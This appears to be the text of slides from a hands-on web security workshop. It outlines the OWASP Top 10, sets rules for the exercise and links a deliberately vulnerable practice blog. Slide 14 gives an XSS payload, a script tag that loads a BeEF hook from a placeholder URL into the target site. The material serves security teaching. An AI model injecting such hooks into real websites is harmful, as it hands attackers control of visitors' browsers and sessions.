7. OWASP Top-10
Injection
Broken Auth and
Session
Management
XSS
Insecure Direct
Object
References
Security
misconfiguration
Sensitive Data
Exposure
Missing
Function Level
Control
CSRF
Using Known
Vulnerable
Components
Unvalidated
Redirects and
Forwards
8. OWASP is GOOD!
Hackers
• Methodologies how to hack
Developers
• Methodologies how to implement things securely
and fix them
Testers
• The same that hackers do
• Methodologies how to test security stuff on
their projects
10. •Either go by scenario with me
or try to find 10
vulnerabilities by yourself.
•No scanners (DDoS alert).
•Do not attack infrastructure.
Only web application
vulnerabilities here.
•Do not attack people around
you.
•No punching.
Rules
13. Cross-Site Scripting
Supply JS code instead of valid data which will
be processed by the browser
Broken Auth
Session management flaws
(HTTPOnly flag is missing in
our case)
XSS + Broken Authentication
14. Inject this script into the website
<script src=“<url to the hook>”
type=“text/javascript”/>
BeEF
15. SQL-injection
Supply SQL operators and statements instead of
valid data which will be processed with the
server as SQL queries (not strings)
Security misconfiguration
Crypto misuse, wrong DB
configuration, etc
Sensitive Data Exposure
Critical info leakage
SQLi + Security Misconfiguration
+ Sensitive Data Exposure
16. Insecure Direct Object
Reference
Access file you have no
permission to
Missing Function Level Control
Access to restricted
(sensitive) function.
Using Components with known Vulnerabilities
Vulnerable OS, libraries, frameworks, CMS,
Algorithms, etc.
Everything else …
17. • Try it by yourself
https://github.com/Varyagovich/hole-blog
• Try to fix the project
• Use OWASP projects (attack/prevention
cheat sheets and tools)
• Contribute!
What to do next?